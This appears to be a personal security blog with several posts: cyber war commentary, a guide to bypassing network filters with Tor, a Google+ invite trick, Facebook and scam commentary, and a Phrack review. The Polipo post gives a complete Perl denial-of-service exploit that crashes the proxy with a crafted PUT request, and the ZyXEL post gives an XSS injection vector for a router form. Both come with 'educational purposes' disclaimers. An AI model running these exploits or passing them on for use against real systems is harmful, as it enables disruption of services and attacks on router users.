The Cyber War !

Cyber war , a very big word , but some how doesn’t seem so big. Let me first give an introduction to what a Cyber War really is. The introduction is divided into two parts , General perception & Reality !

General Perception :

Most of the people in security field know what cyber war is , the general perception is the perception of a cyber war amongst non technical and non security folks ! In general when ever Cyber is added to any word or any sentence,  the impact that it causes to the the listener’s mind is that “Wow ! what a cool name ! “. It doesn’t matter how critical the sentence or the word is , most people don’t take it seriously and the thought that runs in their minds is “Yeah right, this is kids stuff ! “For example , Cyber Bullying , although the impact in reality is very high but there weren’t any laws against it until recently. People used to think , what the hell cyber space is a joke. Its for children , having fun and messing around.

Similarly if people hear about Cyber War any where , they just don’t take it seriously. In their minds they are like , “Cyber War , huh ? What is that ? What can a Cyber War do to me or my country !? ” , because according to them the definition of a cyber war is just a bunch of hackers who don’t have any social life , attacking web sites of other countries and defacing their webpages and then boasting about it , online or amongst friends.

Then these people watch movies like “Die Hard 4.0” and start thinking about the whole concept as just pure entertainment. Thus destroying the slightest spec of seriousness of the word in their minds.

Reality :

In reality Cyber War is a kind of war that starts in the Cyber Space , followed by air & ground attacks , which are pretty real. As in the current age , where cloud computing is the next best thing. Where next generation network technology is in its adolescent phase , where every thing is controlled through a micro chip, or to simplify it  , every thing is computerized. Nuclear Facilities , Hospitals , Industries , Military defense , Electricity etc are all controlled virtually ! I give the example of the movie “Die Hard 4.0” again , though I am not infatuated with this movie but the concept of Firesale is pretty accurate and as this blog is a reference for the Security people as well as a source of information for non technical people thus giving an example of a movie is better then explaining the whole science ! To sum it up , as every thing is automated and computerized thus attacking the systems on a virtual level and bringing them down and as the country gets crippled , its just a matter of walking and claiming it for oneself .

Ok!  Enough with the introduction now lets make things interesting .  Lets start with Stuxnet!! Stuxnet is a very sophisticated cyber weapon created by the US & Israel  against Iranian nuclear facilities. According to the current press , it caused serious damage to the nuclear plan of Iran. Then the appearance of Duqu Malware which was the successor of Stuxnet. Duqu is quite different from Stuxnet, it has a modular structure like Stuxnet but it isn’t equipped with modules for SCADA systems attack. It is only able to steal information from the host system.In recent years China has come on the maps , as a threat to cyber defense. Google in 2010  blamed china for conducting very sophisticated attacks against the Google’s servers.Recent Anonymous attacks against US as well as other countries is also worth mentioning. Wikileaks is also an important part of whats happening in the cyber world.

As Cyber War is the new trend , thus it is very hard to distinguish between cyber criminals and cyber warriors or cyber soldiers. Cyber Armies are being created with full government backing in many countries. As now Cyber space is considered to be a zone which has the same level of importance as the other zones of potential attacks for example Land , Sea , Air !

A full scale Cyber War resembles a Cold War , where you don’t see much activity as during a normal war but , has the power to break down USSR all over again !!!!

Bypass Online Filter Restriction

Hello again !

Disclaimer: All the material shown on this blog is for educational purposes ! We would not be held responsible for any illegal use of the material by any one !

Usually what happens is that people want to visit a website , which is legit , but some how it is listed in the document given to a naive network administrator and you want to download important stuff from it but what the hell , ITS BLOCKED !!!!!!!!  Your boss , teacher or any person whom you report to , doesn’t want hear stuff about BLOCKED SITES !! Its totally lame to them because they want results and you didn’t deliver. This is a very normal problem faced by many employees , students , etc.

First of all you would have to know a little about “Tunnel” . For that please check out my post about Tunneling because your concept of how tunneling works should be very clear. Today I would tell you how one can bypass these filters.

Tor stands for The Onion Router. This was at first created by the US Naval Research Laboratory a long time ago but then was handed over to the people for commercial use ! Though alot of funding is still coming from the US Govt, and alot of other parties. Which is a pretty good thing because TOR was initially designed for anonymity. The goal was that the users would be anonymous over the internet , thus becoming less of a target for the hackers but back then ” Drive By Malware/Exploits were not in mind or yet discovered.

In this blog I would cover the bypassing of filters so anonymity is not the main focus.Ok  how it works is that first you goto the link and download the Vidalia Bundle . Then once downloaded, install the software and all its components.

After installation run the Vidalia executable. Wait for its icon on the tray of the taskbar, to  the right, to become Green. Once that is done , goto the browser’s network option and add following values in the coinciding variables fields :

Proxy Address : 127.0.0.1

Proxy Port : 8118

Ok now save the settings and get out of the options/settings by clicking on OK !

Now your good to go ! To check whether the proxy is working or not goto : What is my IP (dot) com and see your IP Address. For cross checking whether the proxy is working or not , before adding the proxy settings to your browser goto the above mentioned website and note your IP Address and then compare it with the latter!

Enjoy ! If for instance your ISP or Administrator is smart enough to some how block the tor network, goto the TOR control panel and the click the settings button and then goto the netwok tab, it would be something like this :

If you use a proxy to access the internet , usually which is the case in Universities and Offices so this is the option to give proxy to TOR:

There are a few other techniques you could use to bypass the filters , but this one is by far the best.

Peace.

Polipo 1.0.4.1 Proxy Server Denial Of Service

Polipo is a proxy server that is used with TOR (The onion router) vidalia bundle.If we speak in a very abstract and non technical manner then we can say that Polipo routes user’s browser traffic to the tor network. The user has to just give the port number (8118 in case of TOR).

The software’s download page and the exploit code  is as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];

$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed  \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;

#------------------------------

Gatecrashing the Google+ Launch Party

[ Disclaimer: All the material shown on this website is for educational purposes ! We would not be held responsible for any illegal use of the material by any one ! ]

Google+ the new buzz in town !! I see every one on Facebook , commenting about Google+. What is Google+ ? Well it is a social networking project by Google. It has alot of very nice features. Though its not mature enough but still the limited release is very nice. As it is a limited version so even if you Invite some one , they would go up on the page and it would not let you get in . A message saying that the limit has been exceeded.

Today Mr. Usman Ahmed and Mr. Ali Raza Khuwaja  , friends of mine  who are  Penetration Testers working with me , found a work around for inviting people for sure. The fun thing is that it has a 100% success rate uptil now.

The bug found , basically takes advantage of the Circles feature. If you directly send the invite , their would be a problem but if you goto your Home page and in your update section Write any update and just beneath it is an option for adding a Circle (group) to whom the update would be visible to. Write the email address of the Gmail person  as a Circle and post it.

After a while your friend would receive a mail saying:

<< Update on Google+ >>
[Hyper link to Google+] ==>  View or comment on <<Your Name>> post »
The Google+ project is currently working out all the kinks with a small group of testers. If you’re not able to access Google+, please check again soon.

Just click on the hyperlink and your in.

Peace !!!

Facebook Intelligence Or Deception

 

Today I would like to tell you some thing that I noticed a while back in our favorite hangout spot , Facebook ! In today’s world there is nothing that can be called plain and simple.Every thing from Google Search results to Facebook’s friends feeds , are controlled by Algorithms that basically, in simple words control how you see the information.

In Facebook what happens is that it detects and stores your Clicks. Clicks could be any thing ranging from clicking on the like button on some friend’s video or status or comment.Similarly it creates trends of users , for example usually you see that the advertisements shown on your home page are different then that of your friend’s home page. This was harmless and sometimes helped the user to find something of interest in those ads.

Now the scary part. Currently in Facebook what is happening is that those friends with whom u get out of touch on Facebook as in don’t tag them or post any thing on their wall or perform any kind of activity , are automatically removed from the news feeds on your home page.That is you wont see any updates from that friend and you would think that the friend is not using his/her’s Facebook. When in actuality Facebook decided for you whom to see in your feeds and whom not to see.

So I am forced to ask that is Facebook becoming intelligent or is it deceiving us?

Now this for you all to decide!

Peace !!!

Cyber Deception

Cyber Deception has alot of meanings but in this context this means that  hackers start deceiving the government by creating Underground websites or Hackers news websites. These websites show that they are just finding updated news and posting it but  reality is actually somewhat different.You must have heard about the phrase MAKING THE NEWS. Well this is what these groups believe in.

The most Prominent of all is created by the guy who is the part of Indian Cyber Army (unofficial) called The Hacker News and what happens is that they deface any high valued website of Pakistan or around the world and then posts it onto their website as a news. Though they also post websites posted by other hackers but maximum websites posted by hacker news are by the Indian Cyber Army(unofficial).

The funny thing is that most of the lists are fake.Some times they deliberately give links of some website ,which is their target , as a challenge ,thus they dont have to get their hands dirty and the server gets compromised.

An Indian Hacker called Zero , compromised servers of Pakistan and posted the list onto yet another site : Voice of Grey hat

The Strangest thing is that China , Russia and many other countries have created their Cyber Armies.Some of the hackers which are the part of these Cyber Armies start these kinds of websites which is by law totally wrong.

These were some examples of Cyber Deception , there are many more.

Peace out!!!

OSAMA BIN LADEN Scams and Spams

 The scam is currently spreading like a virus on Facebook. The video claims the death of OSAMA BIN LADEN uncensored. And because of that many people are clicking on the link and getting infected.

Infection is pretty easy you watch the video , it has an embedded malware attached to it and it gets downloaded and executed on your PC. On the other hand how its spreading is that when you click on the link it takes you to a rogue application and then the application gets the list of your facebook friends and starts posting the video link on the wall of your friends.

These kinds of events are paradise for Scammers , Spammers , Crackers etc. The best thing to protect ones self is to either use a very good AV in combination with a great antiMalware software and a personal firewall.

Again I would recommend not to click on any link related to OSAMA’s Death.

Peace.

ZyXEL P-660R-T1 V2 XSS Zeroday Vulnerability

I recently found a vulnerability in Zyxel P-660R T1 . Although the impact factor is quite low as it is an XSS (Cross site scripting) but still  a vulnerability is a vulnerability .

Xc0re Security Research Group

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

Exploit:

VECTOR : http://IP/Forms/home_1?&HomeCurrent_Date=‘ XSS Vector ‘01%2F01%2F2000

This works with the post request too ! As by default this value is sent through POST request.

Author : Usman Saeed , Xc0re Security Research Group.

 

 

Phrack 67 !!


Phrack is one of  THE best hacking E-zines in the world !! Phrack’s 67th issue just released ! The most awaited release was a very big disappointment ! Phrack was and is known for its new technically super rich content about the Hidden networks, Compromising new technologies etc but this release was , except a few articles , very basic. For instance an awesome article on ProFTPd rooting but it was for an old version infact a very old version of the Software which was a bummer because getting your hands on a zero-day for proftpd would have been awesome ! 😀

Phrack team had alot of problem (apparently) before the release of this Issue of Phrack !  I dont know the exact issues but still they delayed it many times.  The whole team is different for issue 67 ! Maybe that was the problem ? Well the authors of Phrack 67 would be knowing that better.

All in all it was an ok release ! But if compared with the past releases , it was nothing !! I hope another issue comes out soon ! Maybe even this year 😀 !

Peace !